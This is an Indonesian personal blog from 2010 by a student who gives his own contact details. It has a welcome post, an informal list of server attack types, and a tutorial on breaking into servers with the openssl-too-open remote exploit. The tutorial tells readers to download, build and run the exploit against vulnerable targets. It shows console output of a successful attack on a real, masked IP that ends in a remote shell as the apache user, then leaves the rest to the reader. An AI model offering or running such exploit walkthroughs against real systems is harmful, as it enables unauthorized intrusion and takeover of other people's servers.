Sabtu, 28 Agustus 2010

Welcome To Java Hacking and Cracking

Saya ucapkan selamat datang di Blogger pribadi saya. Semoga dengan adanya blogger ini bisa menjadi sarana bagi para pengunjung pada umumnya dan bagi saya pada khususnya untuk saling bertukar ilmu dan pengetahuan. saya sadar bahwasanya blogger ini masih jauh dari yang namanya sempurna, tapi itulah yang membangkitkan semangat saya untuk terus meningkatkan kemampuan dan menambah ilmu dalam bidang blogger.



About Me 

Nama    : Dedilson Julio Da Cruz pires 

Ttl     : Dili,25 April 1987        
 
Addres  : Jln.Janti No.06 Yogyakarta

School  : STMIK AKAKOM Yogyakarta   

Jur     : S1.Teknik Informatika
Diposting oleh di Tidak ada komentar:

Hacking Open SSL 



1. Download openssl-too-open.tar.gz bisa download dimana aja :)
2. Extract File tersebut
3. Kemudian Make dan Siap di jalankan

Terlebih dahulu yg harus anda lakukan adalah scanning 
terhadap server target apakah vulnerable kalo vulnerable 
kemungkinan bisa di bobol ok di bawah ini hasil server 
yg telah di bobol

[iwan@server1 openssl]$ ./ssl -a 0x08 -v 2xx.xx.xx.xx
: openssl-too-open : OpenSSL remote exploit
  Modified by Escuver & Antihackerlink Crew

: Opening 30 connections
  Establishing SSL connections

 -> ssl_connect_host
 -> ssl_connect_host
 -> ssl_connect_host
 -> ssl_connect_host
: Using the OpenSSL info leak to retrieve the addresses
 -> send_client_hello
 -> get_server_hello
 -> send_client_master_key
 -> generate_session_keys
 -> get_server_verify
 -> send_client_finished
 -> get_server_finished
  ssl0 : 0x8324180
 -> send_client_hello
 -> get_server_hello
 -> send_client_master_key
 -> generate_session_keys
 -> get_server_verify
 -> send_client_finished
 -> get_server_finished
  ssl1 : 0x8324180
 -> send_client_hello
 -> get_server_hello
 -> send_client_master_key
 -> generate_session_keys
 -> get_server_verify
 -> send_client_finished
 -> get_server_finished
  ssl2 : 0x8324180

: Sending shellcode
 -> send_client_hello
 -> get_server_hello
ciphers: 0x8324180   start_addr: 0x83240c0   SHELLCODE_OFS:
208
 -> send_client_master_key
 -> generate_session_keys
 -> get_server_verify
 -> send_client_finished
 -> get_server_error
  Execution of stage1 shellcode succeeded, sending stage2
  Spawning shell...

bash: no job control in this shell
bash-2.04$
bash-2.04$ uname -a; id; w;
Linux localhost.localdomain 2.4.2-2 #1 Sun Apr 8 20:41:30 
EDT 2001 i686 unknown uid=48(apache) gid=48(apache) 
groups=48(apache) 12:01am  up 10 days,  8:00,  
0 users,  load average: 0.24, 0.22, 0.18
USER     TTY      FROM              
LOGIN@   IDLE   JCPU  PCPU  WHAT
bash-2.04$
bash-2.04$

Setelah dapet terserah anda mau diapakan :p oke see yahh tunggu
tutorial saya yg berikut nya :) Salam silent Java Hackerlink 
 
Tutorial Present by Dedhy_BlackHacking
Diposting oleh di Tidak ada komentar:

Mengenal Jenis Serangan Hacking 

Dalam dunia hacking (tepatnya cracking ding!?) dikenal beberapa 
jenis serangan terhadap server. Berikut ini jenis-jenis serangan
dasar yang dapat dikelompokkan dalam minimal 6 kelas, yaitu:

Intrusion
---------
Pada jenis serangan ini seorang cracker (umumnya sudah level 
hacker) akan dapat menggunakan sistem komputer server. 
Serangan ini lebih terfokus pada full access granted
dan tidak bertujuan merusak. Jenis serangan ini pula yg 
diterapkan oleh para hacker untuk menguji keamanan sistem 
jaringan mereka. Dilakukan dalam beberapa tahap dan tidak dalam
skema kerja spesifik pada setiap serangannya (dijelaskan pada 
artikel lain). Hacking is an Art!? =)

Denial of Services (DoS)
------------------------
Penyerangan pada jenis DoS mengakibatkan layanan server
mengalami stuck karena kebanjiran request oleh mesin 
penyerang. 
Pada contoh kasus Distributed Denial of Services (DDoS)
misalnya; dengan menggunakan mesin-mesin zombie, sang 
penyerang akan melakukan packeting request pada server secara 
serentak asimetris dan simultan sehingga buffer server akan
kelabakan menjawabnya!? Stuck/hung akan menimpa server. 
Jadi bukan server lagi namanya!?
(servicenya mati masak dibilang server? hehehe....)

Joyrider
--------
Nah, ini namanya serangan iseng!? Karena kebanyakan baca 
novel-novel hacking dan gak bisa belajar benar, isenglah 
jadinya nyoba-nyoba nyerang pake ilmu-ilmu instan super cepat
(istilahnya 'onani' dimesin orang). Atau dengan alasan 
pengen tau isinya mesin orang!? =).
Yang jelas serangan jenis ini rata-rata karena rasa 
ingin tau, tapi ada juga yang sampe menyebabkan kerusakan 
atau kehilangan data.

Vandal
------
Jenis serangan spesialis pengrusak!? nothing else to 
explain mbah!? =)

Scorekeeper
-----------
Serangan yang bertujuan mencapai reputasi hasil cracking 
terbanyak. Biasanya hanya berbentuk deface halaman web 
(index/nambah halaman) dengan memampangakan NickName 
dan kelompok tertentu. 
Sebagian besar masih tidak perduli dengan isi mesin sasarannya =).
Saat ini jenis penyerang ini lebih dikenal dengan sebutan 
WannaBe/Script kiddies.

Spy
---
Tiga hurup saja. Jenis serangan untuk memperoleh data atau 
informasi rahasia dari mesin target. Biasanya menyerang pada 
mesin-mesin dengan aplikasi database didalamnya. Kadang
kala suatu perusahaan menyewa 'mata-mata' untuk mencuri 
data perusahaan rivalnya!? Mau
coba Pak? =)

Demikian dulu sedikit mengenai jenis serangan pada mesin 
target yang kebanyakan tentunya Semoga menjadi referensi yg 
baik meski kurang layak. Caci maki dapat
ditujukan ke saya pribadi!?










Diposting oleh



di





1 komentar:
  


















Label:

















        

      









Langganan:
Postingan (Atom)